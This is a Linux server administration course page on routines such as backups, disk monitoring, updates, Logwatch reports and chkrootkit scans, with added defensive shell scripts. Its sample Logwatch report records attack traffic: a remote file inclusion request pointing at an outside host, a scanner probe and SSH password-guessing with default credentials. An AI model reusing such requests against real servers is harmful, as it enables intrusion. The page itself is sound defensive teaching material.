Operational routines

If we were to cover operational routines properly, we would really need a separate course. So this is just a handful of small tips on what to focus on.

Physical security

I mention this first because many people forget that it actually matters. Keep the server in a location that is physically secured against burglary and fire. There is little point in making sure your machine cannot be hacked if crooks can walk straight into the server room and carry off the machine or a disk.

Good backup routines

In lab assignment 1 we learned to back up the /etc directory. That is almost just for fun compared with what one really ought to do. Regular backup of all file areas is very important and a critical process for anyone who operates systems. The challenge is having good enough tape drives, and having room to back up all the mp3 files and films people download.

As the operator of a Linux system you should also remember to take a "dump" of any MySQL databases regularly. This is the only way to be sure that the database is consistent and "whole".

And remember: it helps little to be able to back up large file areas and databases if you cannot quickly restore the data. Restores should be tested regularly, and you should almost "have it in your fingers".
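The routine described above, as an added example that is not part of the course material: a shell script that archives a directory into a timestamped tarball, dumps MySQL with mysqldump when it is installed, and then proves the archive actually restores by extracting it into a scratch directory and diffing it against the live tree. The mysqldump step assumes credentials in ~/.my.cnf and is skipped when the tool is absent; all paths and file names in the usage are constructed for the example.

```shell
#!/bin/sh
# Added example (not from the course material): backup, database dump and,
# most importantly, a restore test. A backup that has never been restored
# is only a hope.

# backup_dir SRC DEST_DIR -> prints the path of the archive it wrote.
backup_dir() {
    src="$1"; dest="$2"
    mkdir -p "$dest"
    archive="$dest/$(basename "$src")-$(date +%Y%m%d-%H%M%S).tar.gz"
    # Archive relative to / so the tarball restores into the same layout.
    tar -czf "$archive" -C / "${src#/}"
    echo "$archive"
}

# dump_mysql DEST_DIR -> writes a consistent dump of all databases.
# --single-transaction gives a consistent InnoDB snapshot without locking
# tables. Credentials are assumed to live in ~/.my.cnf (an assumption about
# the local setup). Skipped, with a message, when mysqldump is not installed.
dump_mysql() {
    dest="$1"
    if ! command -v mysqldump >/dev/null 2>&1; then
        echo "mysqldump not installed, skipping database dump" >&2
        return 0
    fi
    mysqldump --single-transaction --all-databases \
        | gzip > "$dest/mysql-all-$(date +%Y%m%d-%H%M%S).sql.gz"
}

# verify_restore ARCHIVE SRC -> returns 0 if the archive restores to a tree
# identical to SRC (same files, same contents), 1 otherwise.
verify_restore() {
    archive="$1"; src="$2"
    scratch=$(mktemp -d)
    tar -xzf "$archive" -C "$scratch"
    if diff -r "$src" "$scratch/${src#/}" >/dev/null; then
        rm -rf "$scratch"; return 0
    else
        rm -rf "$scratch"; return 1
    fi
}

# Usage (constructed paths):
#   archive=$(backup_dir /etc /backup/etc)
#   dump_mysql /backup/mysql
#   verify_restore "$archive" /etc && echo "restore test OK"
```

Note that verify_restore compares against the live tree, so it will correctly fail once the source has changed after the backup was taken; that is the signal that the archive is stale and a fresh backup is due.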

Keep an eye on the users

If you want to avoid trouble, let users install as little as possible themselves. Help them instead, because then you know what they install. Focus on having good password rules, and change passwords often.

Enough disk space

Hard disks have become very cheap, and a very common blunder is forgetting to check whether there is free space on the disk. You check this easily with the "df" command (df: report file system disk space usage).

borrel@ask:~$ df -h
Filesystem            Size  Used Avail Use% Mounted on
/dev/sda1             1,8G  1,3G  460M  73% /
tmpfs                1015M     0 1015M   0% /lib/init/rw
udev                   10M   92K   10M   1% /dev
tmpfs                1015M  4,0K 1015M   1% /dev/shm
/dev/sda2             897M   55M  795M   7% /boot
/dev/sda5             4,6G   38M  4,4G   1% /felles
/dev/sda9             9,2G  6,8G  2,0G  78% /home/ansatte
/dev/sda10             14G  2,3G   11G  18% /home/spesielle
/dev/sda14            214G  204G     0 100% /home/studenter
/dev/sda7             4,6G  1,6G  2,9G  35% /local
/dev/sda8             4,6G  1,2G  3,2G  27% /usr
/dev/sda12            4,6G  4,1G  290M  94% /var
/dev/sda11            9,2G  3,7G  5,1G  42% /var/mail

Then, a little later:

torepeng@ask:~$ df -h
Filesystem            Size  Used Avail Use% Mounted on
/dev/sda1             1,8G  1,3G  460M  73% /
tmpfs                1015M     0 1015M   0% /lib/init/rw
udev                   10M   92K   10M   1% /dev
tmpfs                1015M  4,0K 1015M   1% /dev/shm
/dev/sda2             897M   55M  795M   7% /boot
/dev/sda5             4,6G   38M  4,4G   1% /felles
/dev/sda9             9,2G  6,8G  2,0G  78% /home/ansatte
/dev/sda10             14G  5,1G  8,0G  39% /home/spesielle
/dev/sda14            214G  186G   18G  92% /home/studenter
/dev/sda7             4,6G  1,6G  2,9G  35% /local
/dev/sda8             4,6G  1,2G  3,2G  27% /usr
/dev/sda12            4,6G  4,2G  203M  96% /var
/dev/sda11            9,2G  3,7G  5,1G  42% /var/mail

As we can see, partitioning correctly is very important. In this particular case the server kept running even though one partition filled up completely. The only downside was that the students could not publish their web pages.
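As an added example (not from the course material), a cron-friendly check that does what the author recommends: it reads df output in POSIX format (df -P, one line per filesystem) and reports every filesystem at or above a usage threshold, exiting non-zero so a cron job can mail or alert. The sample df lines are constructed, modelled on the ask server above.

```shell
#!/bin/sh
# Added example (not from the course material): a disk space check meant
# to run from cron, so a full /var or /home/studenter is noticed before the
# users notice it.

# report_full_filesystems THRESHOLD < df-output
#   Prints "mountpoint usage%" for each filesystem at or above THRESHOLD.
#   Returns 1 if at least one filesystem was reported, 0 otherwise.
report_full_filesystems() {
    threshold="$1"
    awk -v limit="$threshold" '
        NR == 1 { next }                 # skip the header line
        {
            pct = $5; sub(/%/, "", pct)  # "94%" -> 94
            if (pct + 0 >= limit) {
                printf "%s %s%%\n", $6, pct
                over = 1
            }
        }
        END { exit (over ? 1 : 0) }
    '
}

# check_disk_space THRESHOLD -> runs df -P on the live system.
#   df -P forces the POSIX single-line format so the column positions are
#   stable even for long device names.
check_disk_space() {
    df -P | report_full_filesystems "$1"
}

# Constructed sample in df -P format (values chosen to mirror the second
# df -h listing above; not real output):
SAMPLE_DF='Filesystem     1024-blocks      Used Available Capacity Mounted on
/dev/sda1          1887436   1363148    428404      73% /
/dev/sda12         4823004   4299540    304296      94% /var
/dev/sda14       224395032 213984360         0     100% /home/studenter
/dev/sda9          9647040   7130000   2026600      78% /home/ansatte'

# Usage:  printf '%s\n' "$SAMPLE_DF" | report_full_filesystems 90
#         check_disk_space 90 || echo "disk space warning" | mail -s df root
```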

 

Keep the server updated

A very large share of "break-ins" on machines is due to software and services running on the server not being kept up to date. So: always make sure the server is updated. Keep your own list of the other programs that need manual maintenance (things that cannot be installed with yum update). Also follow the security forums on the net that track vulnerabilities.

Logwatch

You should already be reasonably familiar with Logwatch (lab assignment 3). What matters most is that you use this tool actively in your day-to-day work. Some system administrator or web administrator must be responsible for making sure the mail is actually read.

Example report:

 ################### Logwatch 7.3 (03/24/06) #################### 
        Processing Initiated: Mon Apr 28 04:02:15 2008
        Date Range Processed: yesterday
                              ( 2008-Apr-27 )
                              Period is day.
      Detail Level of Output: 5
              Type of Output: unformatted
           Logfiles for Host: TEST.hiof.no
  ################################################################## 
 
 --------------------- clam-update Begin ------------------------ 

 The ClamAV update process was started 24 time(s)
 
 Last ClamAV update process started at Sun Apr 27 23:13:51 2008
 
 Last Status:
    Querying current.cvd.clamav.net
    TTL: 299
    Software version from DNS: 0.93
    WARNING: Your ClamAV installation is OUTDATED!
    WARNING: Local version: 0.91.2 Recommended version: 0.93
    DON'T PANIC! Read http://www.clamav.net/support/faq
    main.cvd version from DNS: 46
    main.inc is up to date (version: 46, sigs: 231834, f-level: 26, builder: sven)
    daily.cvd version from DNS: 6973
    daily.inc is up to date (version: 6973, sigs: 40963, f-level: 26, builder: ccordes)
    Received signal: wake up
    Max retries == 5
 
 ---------------------- clam-update End ------------------------- 

 
 --------------------- httpd Begin ------------------------ 

 265.97 MB transferred in 9734 responses  (1xx 0, 2xx 8424, 3xx 1114, 4xx 92, 5xx 104) 
    1924 Images (32.25 MB),
       2 Documents (1.63 MB),
    7786 Content pages (231.82 MB),
      22 Other (0.26 MB) 
 
 Requests with error response codes
    400 Bad Request
       /w00tw00t.at.ISC.SANS.DFind:): 2 Time(s)
    404 Not Found
       //update/update5.php?lang=http://www.cdpm3.com/test.txt???: 2 Time(s)
       /component/: 2 Time(s)
       /content/2104.html: 2 Time(s)
       /content/2107.html: 2 Time(s)
       /content/2111.html: 2 Time(s)
       /content/2115.html: 2 Time(s)
       /content/2118.html: 2 Time(s)
       /content/2123.html: 2 Time(s)
       /content/2125.html: 2 Time(s)
       /content/2132.html: 2 Time(s)
       /content/2134.html: 2 Time(s)
       /content/2139.html: 2 Time(s)
       /content/2144.html: 2 Time(s)
       /content/6450.html: 2 Time(s)
       /content/6452.html: 2 Time(s)
       /content/6454.html: 2 Time(s)
       /content/6457.html: 2 Time(s)
       /content/6459.html: 2 Time(s)
       /content/6461.html: 2 Time(s)
       /content/6463.html: 2 Time(s)
       /content/6465.html: 2 Time(s)
       /content/6467.html: 2 Time(s)
       /content/6469.html: 2 Time(s)
       /content/6470.html: 2 Time(s)
       /false;: 4 Time(s)
       /flash/imageviewer/fadeimages_ws.swf: 2 Time(s)
       /gallery/sarp03-04/bibliotek_1: 2 Time(s)
       /gallery/sarp03-04/bibliotek_4: 2 Time(s)
       /mms-blog/false;: 2 Time(s)
       /rss-feeds/finance/: 2 Time(s)
       /rss-feeds/linux/: 2 Time(s)
       /static/fjernundervisning/: 2 Time(s)
       /templates/247extender/favicon.ico: 24 Time(s)
    500 Internal Server Error
       /component/option,com_gallery2/Itemid,27/? ... ment.AddComment: 4 Time(s)
       /static/gallery/main.php: 20 Time(s)
       /static/gallery/main.php?g2_view=rss.Simpl ... &g2_itemId=5751: 2 Time(s)
       /static/gallery/main.php?g2_view=rss.Simpl ... &g2_itemId=5769: 2 Time(s)
       /static/gallery/main.php?g2_view=rss.Simpl ... &g2_itemId=5925: 2 Time(s)
       /static/gallery/main.php?g2_view=rss.Simpl ... &g2_itemId=6031: 2 Time(s)
       /static/gallery/main.php?g2_view=rss.Simpl ... &g2_itemId=6185: 2 Time(s)
       /static/gallery/main.php?g2_view=rss.Simpl ... &g2_itemId=6239: 2 Time(s)
       /static/gallery/main.php?g2_view=rss.Simpl ... &g2_itemId=6248: 2 Time(s)
       /static/gallery/main.php?g2_view=rss.Simpl ... &g2_itemId=6272: 2 Time(s)
       /static/gallery/main.php?g2_view=rss.Simpl ... &g2_itemId=6383: 2 Time(s)
       /static/gallery/main.php?g2_view=rss.Simpl ... &g2_itemId=6467: 6 Time(s)
       /static/gallery/main.php?g2_view=rss.Simpl ... &g2_itemId=6789: 4 Time(s)
       /static/gallery/main.php?g2_view=rss.Simpl ... &g2_itemId=6798: 6 Time(s)
       /static/gallery/main.php?g2_view=rss.Simpl ... &g2_itemId=6807: 4 Time(s)
       /static/gallery/main.php?g2_view=rss.Simpl ... &g2_itemId=6824: 6 Time(s)
       /static/gallery/main.php?g2_view=rss.Simpl ... &g2_itemId=6842: 4 Time(s)
       /static/gallery/main.php?g2_view=rss.Simpl ... &g2_itemId=6882: 4 Time(s)
       /static/gallery/main.php?g2_view=rss.Simpl ... &g2_itemId=6927: 4 Time(s)
       /static/gallery/main.php?g2_view=rss.Simpl ... &g2_itemId=6973: 6 Time(s)
       /static/gallery/main.php?g2_view=rss.Simpl ... &g2_itemId=7107: 4 Time(s)
       /static/gallery/main.php?g2_view=rss.Simpl ... &g2_itemId=7137: 4 Time(s)
       /static/gallery/main.php?g2_view=rss.Simpl ... &g2_itemId=7169: 4 Time(s)
       /static/gallery/main.php?g2_view=rss.Simpl ... &g2_itemId=7341: 4 Time(s)
       /static/gallery/main.php?g2_view=rss.Simpl ... &g2_itemId=8318: 2 Time(s)
 
 A total of 14 ROBOTS were logged 
 
 ---------------------- httpd End ------------------------- 

 
 --------------------- IMAP Begin ------------------------ 

 
 [IMAPd] Connections:
 =========================
                                   Host | Connections |    SSL   |   Total  
 -------------------------------------- | ----------- | -------- | ---------
                              127.0.0.1 |           2 |        0 |         2
                         158.22.155.130 |           3 |        0 |         3
                         158.88.166.131 |           4 |        0 |         4
                           212.32.55.77 |           2 |        0 |         2
                          83.441.44.244 |           3 |        0 |         3
 ---------------------------------------------------------------------------
                                                   14 |        0 |        14
 
 
 
 [IMAPd] Logout stats:
 ====================
                                    User | Logouts | Downloaded |  Mbox Size
 --------------------------------------- | ------- | ---------- | ----------
                                     ??? |       2 |          0 |          0
                                hi11111l |       1 |          0 |          0
                                 mm111er |       2 |          0 |          0
                                tor222ng |       5 |          0 |          0
                      toreeeng_noeeeeerk |       1 |          0 |          0
 ---------------------------------------------------------------------------
                                                11 |          0 |          0
 
 
 
 ---------------------- IMAP End ------------------------- 

 
 --------------------- iptables firewall Begin ------------------------ 

 
 Dropped 54 packets on interface eth0
    From 61.132.223.14 - 2 packets
       To 158.39.165.72 - 2 packets
          Service: ms-sql-m (udp/1434) (Shorewall:net2all:DROP:) - 2 packets
    From 67.107.106.107 - 2 packets
       To 158.39.165.72 - 2 packets
          Service: 5900 (tcp/5900) (Shorewall:net2all:DROP:) - 2 packets
    From 121.14.104.165 - 1 packet
       To 158.39.165.72 - 1 packet
          Service: ms-sql-m (udp/1434) (Shorewall:net2all:DROP:) - 1 packet
    From 146.164.61.10 - 8 packets
       To 158.39.165.72 - 8 packets
          Service: 2967 (tcp/2967) (Shorewall:net2all:DROP:) - 4 packets
          Service: 6129 (tcp/6129) (Shorewall:net2all:DROP:) - 4 packets
    From 158.39.165.72 - 18 packets
       To 158.39.165.255 - 18 packets
          Service: 7741 (udp/7741) (Shorewall:net2all:DROP:) - 18 packets
    From 158.39.165.145 - 18 packets
       To 158.39.165.72 - 18 packets
          Service: 7742 (udp/7742) (Shorewall:net2all:DROP:) - 18 packets
    From 202.103.180.105 - 1 packet
       To 158.39.165.72 - 1 packet
          Service: ms-sql-m (udp/1434) (Shorewall:net2all:DROP:) - 1 packet
    From 218.95.83.131 - 2 packets
       To 158.39.165.72 - 2 packets
          Service: 2967 (tcp/2967) (Shorewall:net2all:DROP:) - 2 packets
    From 218.106.91.25 - 1 packet
       To 158.39.165.72 - 1 packet
          Service: ms-sql-m (udp/1434) (Shorewall:net2all:DROP:) - 1 packet
    From 220.163.85.203 - 1 packet
       To 158.39.165.72 - 1 packet
          Service: ms-sql-m (udp/1434) (Shorewall:net2all:DROP:) - 1 packet
 
 ---------------------- iptables firewall End ------------------------- 

 
 --------------------- Kernel Begin ------------------------ 

 
 WARNING:  Kernel Errors Present
    end_request: I/O error, dev fd0, sector ...:  2 Time(s)
 
 4 Time(s): ll header: ff:ff:ff:ff:ff:ff:00:17:f2:04:cc:f2:08:00
 4 Time(s): martian source 158.39.165.255 from 158.39.165.72, on dev eth0
 
 ---------------------- Kernel End ------------------------- 

 
 --------------------- MailScanner Begin ------------------------ 

 
 MailScanner Status:
 	83 messages Scanned by MailScanner
 	557.5 Total KB
 	51 Spam messages detected by MailScanner
 	1 Content Problems found by MailScanner
 	34 Messages delivered by MailScanner
 
 Content Report: (Total Seen = 1)
     web bug tags: 1 Time(s)
 
 ---------------------- MailScanner End ------------------------- 

 
 --------------------- pam_unix Begin ------------------------ 

 crond:
    Sessions Opened:
       root: 154 Time(s)
 
 su:
    Sessions Opened:
       torepeng(uid=500) -> root: 2 Time(s)
 
 
 ---------------------- pam_unix End ------------------------- 

 
 --------------------- Connections (secure-log) Begin ------------------------ 

 
 Connections:
    Service ssh [Connection(s) per day]:
       121.162.129.138: 36 Time(s)
       158.32.1732.131: 2 Time(s)
       Total Connections: 38
    Service imap [Connection(s) per day]:
       83.1841.20.333: 6 Time(s)
       127.0.0.1 (test.htef.no): 4 Time(s)
       158.39.244.13330: 6 Time(s)
       158.39.244.1331: 8 Time(s)
       212.32.55.77 (mail.ctl-eng.com): 4 Time(s)
       Total Connections: 28
 
 **Unmatched Entries**
 msec: set variable SystemMenu to true in /etc/X11/gdm/gdm.conf
 msec: set variable SystemMenu to true in /etc/X11/gdm/gdm.conf
 msec: set variable SystemMenu to true in /etc/X11/gdm/gdm.conf
 msec: set variable SystemMenu to true in /etc/X11/gdm/gdm.conf
 msec: set variable SystemMenu to true in /etc/X11/gdm/gdm.conf
 msec: set variable SystemMenu to true in /etc/X11/gdm/gdm.conf
 msec: changed mode of /var/log/security/open_port.today from 644 to 640
 msec: changed mode of /var/log/security/rpm-va-config.today from 644 to 640
 msec: changed mode of /var/log/security/chkrootkit.today from 644 to 640
 msec: changed mode of /var/log/security/suid_root.today from 644 to 640
 msec: changed mode of /var/log/security/suid_md5.today from 644 to 640
 msec: changed mode of /var/log/security/rpm-va.today from 644 to 640
 msec: changed mode of /var/log/security/unowned_group.today from 644 to 640
 msec: changed mode of /var/log/security/writable.today from 644 to 640
 msec: changed mode of /var/log/security/rpm-qa.today from 644 to 640
 msec: changed mode of /var/log/security/unowned_user.today from 644 to 640
 msec: changed mode of /var/log/security/sgid.today from 644 to 640
 msec: set variable SystemMenu to true in /etc/X11/gdm/gdm.conf
 msec: set variable SystemMenu to true in /etc/X11/gdm/gdm.conf
 msec: set variable SystemMenu to true in /etc/X11/gdm/gdm.conf
 msec: set variable SystemMenu to true in /etc/X11/gdm/gdm.conf
 msec: set variable SystemMenu to true in /etc/X11/gdm/gdm.conf
 msec: set variable SystemMenu to true in /etc/X11/gdm/gdm.conf
 msec: set variable SystemMenu to true in /etc/X11/gdm/gdm.conf
 msec: set variable SystemMenu to true in /etc/X11/gdm/gdm.conf
 msec: set variable SystemMenu to true in /etc/X11/gdm/gdm.conf
 msec: set variable SystemMenu to true in /etc/X11/gdm/gdm.conf
 msec: set variable SystemMenu to true in /etc/X11/gdm/gdm.conf
 msec: set variable SystemMenu to true in /etc/X11/gdm/gdm.conf
 msec: set variable SystemMenu to true in /etc/X11/gdm/gdm.conf
 msec: set variable SystemMenu to true in /etc/X11/gdm/gdm.conf
 msec: set variable SystemMenu to true in /etc/X11/gdm/gdm.conf
 msec: set variable SystemMenu to true in /etc/X11/gdm/gdm.conf
 msec: set variable SystemMenu to true in /etc/X11/gdm/gdm.conf
 msec: set variable SystemMenu to true in /etc/X11/gdm/gdm.conf
 
 ---------------------- Connections (secure-log) End ------------------------- 

 
 --------------------- sendmail Begin ------------------------ 

 
 
 SENDMAIL CONFIGURATION
 ----------------------
 
 Warning: STARTTLS file errors:
     CRLFile missing
     client: file /etc/ssl/sendmail/MYcert.pem unsafe: No such file or directory
 
 No active milter filters
 
 
 STATISTICS
 ----------
 
 Bytes Transferred:      544074
 Messages Processed:     89
 Addressed Recipients:   89
 
 SMTP SESSION, MESSAGE, OR RECIPIENT ERRORS
 ------------------------------------------
     and they failed because of:
         no certificate assigned
 
 Lost input channel: [Occurrences >= 1]
     [78.167.221.233]   1 Time(s)
     75-130-179-226.dhcp.hlrg.nc.charter.com [75.130.179.226]   1 Time(s)
     [217.219.170.202]   1 Time(s)
     r190-135-187-59.dialup.adsl.anteldata.net.uy [190.135.187.59]   1 Time(s)
     [65.87.252.79]   1 Time(s)
     [210.124.129.214]   1 Time(s)
 	Total:  6
 
 Client quit before communicating: [Occurrences >= 1]
     [65.87.252.79]   1 Time(s)
     [78.167.221.233]   1 Time(s)
     r190-135-187-59.dialup.adsl.anteldata.net.uy [190.135.187.59]   1 Time(s)
 	Total:  3
 
 STARTTLS failed to verify certificates:
     self signed certificate in certificate chain: 1 Time(s)
 	Total:  1
 
 Rejected mail: [Occurrences >= 1]
     <nossemark.nossemark.se451 4.1.8 Domain of sender address 
 weqbaya@film-tv-connection.com does not resolve): 1 Time(s)
 	Total:  1
 
 Mail Rejected:
     RSET:
         To: <nossemarknossemark.se>: 1 Time(s)
 	Total:  1
 
 Total SMTP Session, Message, and Recipient Errors handled by Sendmail:  12
 
 **Unmatched Entries**
    STARTTLS=client, error: SSL_CTX_check_private_key failed(/etc/ssl/sendmail/MYkey.pem): 0: 34 Time(s)
    STARTTLS=client, info: fds=9/8, err=2: 2 Time(s)
    STARTTLS=read, info: fds=9/8, err=2: 2 Time(s)
 
 ---------------------- sendmail End ------------------------- 

 
 --------------------- sendmail-largeboxes (large mail spool files) Begin ------------------------ 

 Large Mailbox threshold: 40MB (41943040 bytes)
  Warning: Large mailbox: txxxxx_nccc (43633633)
 
 ---------------------- sendmail-largeboxes (large mail spool files) End ------------------------- 

 
 --------------------- SSHD Begin ------------------------ 

 
 Failed logins from:
    121.162.129.138: 12 times
       root/password: 12 times
 
 Illegal users from:
    121.162.129.138: 24 times
       admin/password: 8 times
       test/password: 8 times
       guest/password: 4 times
       user/password: 4 times
 
 Users logging in through sshd:
    torepeng:
       158.33.1333.1331: 2 times
 
 Could not get shadow information for:
    NOUSER : 24 Time(s)
 
 ---------------------- SSHD End ------------------------- 

 
 --------------------- Disk Space Begin ------------------------ 

 Filesystem            Size  Used Avail Use% Mounted on
 /dev/hda6              22G  7.6G   13G  38% /
 /dev/hdc6              58G   29G   30G  50% /backup
 /dev/hda5              49G   37G   12G  76% /home
 
 
 ---------------------- Disk Space End ------------------------- 

 
 ###################### Logwatch End #########################

As we can see, an overview of how much disk space is in use is also included by default.
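The SSHD section of the report above is the part most worth reading every day. As an added example, not part of the course material or of Logwatch itself, here is a small shell function that produces the same kind of summary from raw /var/log/secure lines: it separates failed logins against real accounts from attempts against "illegal" (nonexistent) users, counts both per source address, and exits non-zero when any address crosses a threshold so a cron job can raise an alarm. The log lines are constructed (documentation addresses, made-up names).

```shell
#!/bin/sh
# Added example (not from the course material): per-address summary of
# failed SSH logins, the way Logwatch's SSHD section presents them.

# Constructed sample log lines in the format sshd writes to /var/log/secure:
SAMPLE_SECURE='Apr 27 03:10:01 test sshd[4101]: Failed password for root from 192.0.2.10 port 40122 ssh2
Apr 27 03:10:04 test sshd[4103]: Failed password for root from 192.0.2.10 port 40123 ssh2
Apr 27 03:10:07 test sshd[4105]: Failed password for invalid user admin from 192.0.2.10 port 40124 ssh2
Apr 27 03:10:09 test sshd[4107]: Failed password for invalid user test from 192.0.2.10 port 40125 ssh2
Apr 27 08:15:22 test sshd[5210]: Accepted publickey for torepeng from 198.51.100.7 port 51000 ssh2
Apr 27 08:16:00 test sshd[5230]: Failed password for torepeng from 198.51.100.7 port 51002 ssh2'

# ssh_failure_report THRESHOLD < secure-log
#   Prints one line per source address:  <ip> failed=<n> illegal=<m>
#   Returns 1 if any address has failed+illegal >= THRESHOLD, else 0.
ssh_failure_report() {
    awk -v limit="$1" '
        # The client address is the token after "from"; locating it this way
        # survives trailing extras such as "[preauth]" that some versions add.
        function source_ip(    i) {
            for (i = 1; i < NF; i++) if ($i == "from") return $(i + 1)
            return "?"
        }
        /sshd\[[0-9]+\]: Failed password for invalid user / {
            ip = source_ip(); illegal[ip]++; seen[ip] = 1; next
        }
        /sshd\[[0-9]+\]: Failed password for / {
            ip = source_ip(); failed[ip]++; seen[ip] = 1; next
        }
        END {
            for (ip in seen) {
                printf "%s failed=%d illegal=%d\n", ip, failed[ip], illegal[ip]
                if (failed[ip] + illegal[ip] >= limit) alarm = 1
            }
            exit (alarm ? 1 : 0)
        }
    '
}

# Usage:  printf '%s\n' "$SAMPLE_SECURE" | ssh_failure_report 10
#         ssh_failure_report 10 < /var/log/secure || echo "ssh brute force?"
```

The "illegal user" count is the more telling of the two: a real user mistyping a password hits an existing account, whereas a dictionary run walks through admin, test, guest and so on exactly as in the report above.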

 

Chkrootkit

Chkrootkit is a small program that checks whether your machine has been "hacked" and whether the intruder has installed a "rootkit" on it. If you want to know more about rootkits, read the Wikipedia pages. Chkrootkit can be installed with "yum install chkrootkit". Once that is done, run the command "chkrootkit". It will then scan the machine and try to determine whether a rootkit has been installed.

Example output from chkrootkit:

neted1:/etc/cron.daily# chkrootkit
ROOTDIR is `/'
Checking `amd'... not found
Checking `basename'... not infected
Checking `biff'... not found
Checking `chfn'... not infected
Checking `chsh'... not infected
Checking `cron'... not infected
Checking `crontab'... not infected
Checking `date'... not infected
Checking `du'... not infected
Checking `dirname'... not infected
Checking `echo'... not infected
Checking `egrep'... not infected
Checking `env'... not infected
Checking `find'... not infected
Checking `fingerd'... not found
Checking `gpm'... not found
Checking `grep'... not infected
Checking `hdparm'... not found
Checking `su'... not infected
Checking `ifconfig'... not infected
Checking `inetd'... not infected
Checking `inetdconf'... not infected
Checking `identd'... not found
Checking `init'... not infected
Checking `killall'... not infected
Checking `ldsopreload'... not infected
Checking `login'... not infected
Checking `ls'... not infected
Checking `lsof'... not infected
Checking `mail'... not infected
Checking `mingetty'... not found
Checking `netstat'... not infected
Checking `named'... not found
Checking `passwd'... not infected
Checking `pidof'... not infected
Checking `pop2'... not found
Checking `pop3'... not found
Checking `ps'... not infected
Checking `pstree'... not infected
Checking `rpcinfo'... not infected
Checking `rlogind'... not found
Checking `rshd'... not found
Checking `slogin'... not infected
Checking `sendmail'... not infected
Checking `sshd'... not infected
Checking `syslogd'... not infected
Checking `tar'... not infected
Checking `tcpd'... not infected
Checking `tcpdump'... not infected
Checking `top'... not infected
Checking `telnetd'... not found
Checking `timed'... not found
Checking `traceroute'... not infected
Checking `vdir'... not infected
Checking `w'... not infected
Checking `write'... not infected
Checking `aliens'... no suspect files
Searching for sniffer's logs, it may take a while... nothing found
Searching for HiDrootkit's default dir... nothing found
Searching for t0rn's default files and dirs... nothing found
Searching for t0rn's v8 defaults... nothing found
Searching for Lion Worm default files and dirs... nothing found
Searching for RSHA's default files and dir... nothing found
Searching for RH-Sharpe's default files... nothing found
Searching for Ambient's rootkit (ark) default files and dirs... nothing found
Searching for suspicious files and dirs, it may take a while...
/lib/init/rw/.ramfs

Searching for LPD Worm files and dirs... nothing found
Searching for Ramen Worm files and dirs... nothing found
Searching for Maniac files and dirs... nothing found
Searching for RK17 files and dirs... nothing found
Searching for Ducoci rootkit... nothing found
Searching for Adore Worm... nothing found
Searching for ShitC Worm... nothing found
Searching for Omega Worm... nothing found
Searching for Sadmind/IIS Worm... nothing found
Searching for MonKit... nothing found
Searching for Showtee... nothing found
Searching for OpticKit... nothing found
Searching for T.R.K... nothing found
Searching for Mithra... nothing found
Searching for OBSD rk v1... nothing found
Searching for LOC rootkit... nothing found
Searching for Romanian rootkit... nothing found
Searching for Suckit rootkit... nothing found
Searching for Volc rootkit... nothing found
Searching for Gold2 rootkit... nothing found
Searching for TC2 Worm default files and dirs... nothing found
Searching for Anonoying rootkit default files and dirs... nothing found
Searching for ZK rootkit default files and dirs... nothing found
Searching for ShKit rootkit default files and dirs... nothing found
Searching for AjaKit rootkit default files and dirs... nothing found
Searching for zaRwT rootkit default files and dirs... nothing found
Searching for Madalin rootkit default files... nothing found
Searching for Fu rootkit default files... nothing found
Searching for ESRK rootkit default files... nothing found
Searching for rootedoor... nothing found
Searching for ENYELKM rootkit default files... nothing found
Searching for anomalies in shell history files... Warning: `//root/.mysql_history' file size is zero
Checking `asp'... not infected
Checking `bindshell'... not infected
Checking `lkm'... chkproc: nothing detected
Checking `rexedcs'... not found
Checking `sniffer'... lo: not promisc and no packet sniffer sockets
eth0: not promisc and no packet sniffer sockets
Checking `w55808'... not infected
Checking `wted'... chkwtmp: nothing deleted
Checking `scalper'... not infected
Checking `slapper'... not infected
Checking `z2'... chklastlog: nothing deleted

Here it has first gone through the standard services and commands and checked whether any of them have been replaced.

If your machine has been hacked and a rootkit has been installed on it, you must NOT trust the usual commands on the system.
Example: the "w" command:

torepeng@ask:~$ w
 12:06:37 up 76 days,  2:53,  3 users,  load average: 0,06, 0,10, 0,08
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
tms      pts/0    pc164-106.hiof.n 09:16    6:19m  0.14s  0.02s sshd: tms [priv]
hansob   pts/2    hob.hiof.no      09:38    1:54   0.01s  0.00s sshd: hansob [priv]
torepeng pts/3    pc165-110.hiof.n 11:46    0.00s  0.01s  0.00s w

Here I list three users who are supposed to be logged in. In reality there could have been four, but one of them could have been hidden (because the original w command was replaced with a tailor-made w that hides the malicious user). This is of course done so that I, as the system administrator, will not realise that something is wrong. If I saw the user "evil_user", I would obviously suspect that something was wrong.
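One way to catch exactly this trick, added here as an example and not part of the course material: cross-check the users that w or who report against the processes actually attached to terminals. A replaced w binary can drop a line from its own output, but the hidden user's shell still sits in the process table (a kernel-level rootkit can hide that too, which is why chkrootkit's lkm check matters). The function takes both listings as text so it can run over constructed samples; on a live system you would feed it "who" and "ps -eo user,tty", ideally from statically linked copies kept on read-only media. The sample user "evil_user" is the page's own hypothetical.

```shell
#!/bin/sh
# Added example (not from the course material): find terminal sessions
# that the login listing does not admit to.

# hidden_tty_users WHO_OUTPUT PS_OUTPUT
#   Prints "user tty" for every terminal session in PS_OUTPUT whose user
#   does not appear in WHO_OUTPUT. Returns 1 if any was found, else 0.
hidden_tty_users() {
    who_out="$1"; ps_out="$2"
    printf '%s\n' "$ps_out" | awk -v who="$who_out" '
        BEGIN {
            # Users according to who/w: first column of each line.
            n = split(who, lines, "\n")
            for (i = 1; i <= n; i++) {
                split(lines[i], f, " ")
                if (f[1] != "") known[f[1]] = 1
            }
        }
        NR == 1 { next }                      # "USER TT" header from ps
        # Only real terminals count; "?" means no controlling tty.
        $2 ~ /^(pts\/|tty)/ && !($1 in known) && !seen[$1 $2]++ {
            print $1, $2; hidden = 1
        }
        END { exit (hidden ? 1 : 0) }
    '
}

# Constructed sample of "who" output, matching the three users above:
SAMPLE_WHO='tms      pts/0        2008-04-28 09:16 (pc164-106.hiof.no)
hansob   pts/2        2008-04-28 09:38 (hob.hiof.no)
torepeng pts/3        2008-04-28 11:46 (pc165-110.hiof.no)'

# Constructed sample of "ps -eo user,tty" output with a fourth session that
# the (hypothetically trojaned) w above left out:
SAMPLE_PS='USER     TT
root     ?
tms      pts/0
hansob   pts/2
torepeng pts/3
evil_user pts/1
evil_user pts/1'

# Usage:  hidden_tty_users "$SAMPLE_WHO" "$SAMPLE_PS"
#         hidden_tty_users "$(who)" "$(ps -eo user,tty)" || echo "check this box"
```

The check is deliberately one-directional: a user in who but not in ps is just a session whose shell has exited, which is normal; a user in ps but not in who is the case the text warns about.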

 

Remember to update web applications

